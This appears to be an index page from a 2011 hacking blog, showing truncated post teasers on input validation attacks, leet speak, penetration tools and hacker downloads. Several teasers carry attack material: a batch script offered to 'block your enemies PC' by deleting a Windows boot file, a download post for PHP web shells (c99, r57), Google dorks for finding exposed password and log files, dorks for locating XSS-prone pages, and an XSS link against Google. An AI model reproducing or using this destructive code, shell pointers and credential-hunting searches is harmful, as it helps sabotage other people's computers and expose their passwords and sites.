Monday, August 22, 2011

What Are Input Validation Attacks

0 comments
Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application. The most common input validation attacks are as follows- 1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement...

Speaking LEET(1337) The Language Of HACKERS

0 comments
Leet, the language of the Geeks and Hackers. To speak leet, you more or less need to un-learn proper english. The history of leet goes back to the early days of online message boards, or forums, where users can post messages to carry on a threaded conversation. In an attempt to “Clean-Up” the...

OWASP Zed Attack Proxy (ZAP) v.1.3.2 Released

0 comments
The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration...

JonDoFox 2.5.3 - Browser Optimized for anonymous and secure web surfing

0 comments
The JonDoFox research team has uncovered a new attack on web browsers : Affected are the web browsers Firefox, Chrome and Safari. By a hidden call over of a URL with HTTP authentication data, third party sites could track a user over several web sites, even if the user blocks all cookies and other...

Sunday, August 21, 2011

The Hackers Underground Handbook Free Download

2 comments
Hey friends finally i have found out the most popular & costly book this is " The Hackers Underground Handbook" is free to download.... i hope that u all are need the book and waited so much... so keep hurry and download today now... DOWNLOAD...

Wednesday, June 1, 2011

Most Poular Shells Download

0 comments
DOWNLOAD:************** bypass c99 c99ud r57 safe0ve...

XSS Scanner 1.0

7 comments
-----------------------------=[ XSS ScanneR 1.0 ]=----------------------------- By Xylitol I show you 20 dork exemples: inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inurl:".php?search=" inurl:".php?query=" inurl:".php?searchstring=" inurl:".php?keyword=" inurl:".php?file=" inurl:".php?years=" inurl:".php?txt=" inurl:".php?tag=" inurl:".php?max=" inurl:".php?from=" inurl:".php?author=" inurl:".php?pass=" inurl:".php?feedback=" inurl:".php?mail=" inurl:".php?cat=" inurl:".php?vote=" top...

Language of Hacker

1 comments
To speak leet, you more or less need to un-learn proper english. The history of leet goes back to the early days of online message boards, or forums, where users can post messages to carry on a threaded conversation. In an attempt to “Clean-Up” the language that users would sometimes post, admins...

GooGle Secret

2 comments
"admin account info" filetype:log!Host=*.* intext:enc_UserPassword=* ext:pcf"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd"AutoCreate=TRUE password=*""http://*:*@www" domainname"index of/"...

Cross Site Scripting (XSS) vulnerability in Google Search Engine !

0 comments
Vulnerabile Link:*****************http://www.google.com/custom?hl=en&cof=L%3Ahttps%3A%2F%2Flh5.googleusercontent.com%2F_bCYQxIvMQ2U%2FTRMT2a-UiQI%2FAAAAAAAAAYU%2FWXKFKDTesOs%2Fs640%2Fhackernews.jpg%3BBGC%3A%231f1f1f%3B&q=http%3A%2F%2Fwww.thehackernews.com%2F&btnG=Sea...

BLOCK YOUR ENEMIES PC

0 comments
HEY HERE IS THE SIMPLE WAY 2 BLOCK YOUR ENEMIES PCThe Simple Deadliest Codeopen notepad type the code as following -___________________________________________________echo offC:cd..cd..cd..attrib -r -s -h ntdetect.comdel ntdetect.comecho onprint U r a LOSER.. PC Hacked by M@$ H...

Trick To Enable Or Disable Ur CMD

0 comments
For Enable Code:***************[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]"DisableCMD"=dword:00000000For Disable Code:***************[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]"DisableCMD"=dword:00000...

What is Fire Sale?

2 comments
A fire sale is an unpopular term from popular fiction describing athree-stage coordinated attack on a country's transportation,telecommunications, financial, and utilities infrastructure systems.The attacks are designed to promote chaos and foster a leaderless environment.he term "fire sale" is used...

Monday, May 30, 2011

Dragon Browser For Hackers

1 comments
Hey everyone, this is Harsh Daftary presenting new browser made for hacker’s.. Browser purely made in vb, small yet fast browser. This includes hacking and programming zone’s and some hacking tools.. Features: Windows Mail Online Media Player Hacking News Zone (The Hacker News) Programming Zone Hacking...